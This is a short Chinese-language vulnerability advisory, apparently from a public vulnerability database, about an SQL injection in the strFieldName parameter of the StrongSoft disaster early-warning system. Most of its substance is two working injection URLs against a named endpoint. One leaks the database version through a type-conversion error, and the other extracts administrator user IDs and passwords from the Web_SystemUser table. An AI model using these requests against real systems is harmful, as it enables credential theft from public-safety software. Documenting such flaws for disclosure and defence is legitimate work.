StrongSoft灾害预警系统strFieldName参数SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

``` 注入链接:/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数:strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convert(int,@@version) 【管理员账号密码】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convert(int,(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser)) ``` ![](https://images.seebug.org/contribute/84ddd268-7638-4e37-a15d-cf3663c5ae80-屏幕快照 2016-01-15 下午10.54.31.png) ![](https://images.seebug.org/contribute/befddf50-d36f-4f77-a4da-8f18a58f211e-屏幕快照 2016-01-15 下午10.54.58.png)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息